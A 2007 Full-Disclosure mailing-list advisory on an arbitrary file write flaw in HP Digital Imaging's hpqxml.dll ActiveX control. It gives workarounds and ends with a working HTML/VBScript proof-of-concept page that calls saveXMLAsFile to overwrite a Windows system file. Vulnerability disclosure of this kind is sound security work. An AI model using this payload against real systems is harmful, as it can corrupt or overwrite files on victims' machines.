[<prev] [next>] [day] [month] [year] [list]
Message-ID: <!~!UENERkVCMDkAAQACAAAAAAAAAAAAAAAAABgAAAAAAAAAgm00MeKvRUGIfT1T4tENwMKAAAAQAAAAfj1L029Kk0C1s0GzBZbT8QEAAAAA@shellcode.com.ar>
Date: Thu, 28 Jun 2007 01:20:21 +0200
From: "Goodfellas SRT" <goodfellas@...llcode.com.ar>
To: <full-disclosure@...ts.grok.org.uk>
Subject: [GOODFELLAS - VULN] hpqxml.dll 2.0.0.133 from HP
Digital Imaging Arbitary Data Write.
> :. GOODFELLAS Security Research TEAM .:
> :. http://goodfellas.shellcode.com.ar .:
>
> hpqxml.dll 2.0.0.133 from HP Digital Imaging Arbitary Data Write
> ===================================================
>
> Internal ID: VULWAR200706275.
>
> Introduction
>
> hpqxml.dll is a library included in the HP Photo Digital Imaging
> software package from the HP Company. http://www.hp.com.
> Link:
> http://www.hp.com/united-states/consumer/digital_photography/home_f.html
>
>
> Tested In
>
> - Windows XP SP2 english/french with IE 6.0 / 7.0.
> - Windows vista Professional English/French SP1 with IE 7.0
>
>
> Summary
>
> The saveXMLAsFile method doesn't check if it is being called from the
> application
> or from a malicious user.
>
>
> Impact
>
> The vulnerability is due to an error in the saveXMLAsFile method that
> manipulate
> local files insecurely, which could allow malicious users to write
> arbitrary
> data to any file on a vulnerable system. Besides, the method does not
> check the
> file headers before writing.
>
>
> Workaround
>
> - Activate the Kill bit zero in
> clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3.
> - Unregister hpqxml.dll using regsvr32.
>
>
> Timeline
>
> June 27, 2007 -- Bug discovery.
> June 27, 2007 -- Bug published.
>
>
> Credits
>
> * Brian Mariani <bmariani@...llcode.com.ar
> * GoodFellas Security Research Team <goodfellas.shellcode.com.ar>
>
>
> Technical Detail
>
> saveXMLAsFile method receives a filename as an argument, with this format
> "c:\path\file".
>
>
> Proof of Concept
>
> <html>
> <head>
> <title>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write</title>
> </head>
> <body>
> <h3>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write</h3><br>
>
> <object classid='clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3' id='target'
> /></object>
>
> <input language=VBScript onclick=HP() type=button value="Proof of
> Concept">
>
> <script language = 'vbscript'>
>
> Sub HP()
>
> filename = "C:\NTDETECT_.COM"
>
> target.saveXMLAsFile filename
>
> End Sub
>
> </script>
> </body>
> </html>
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists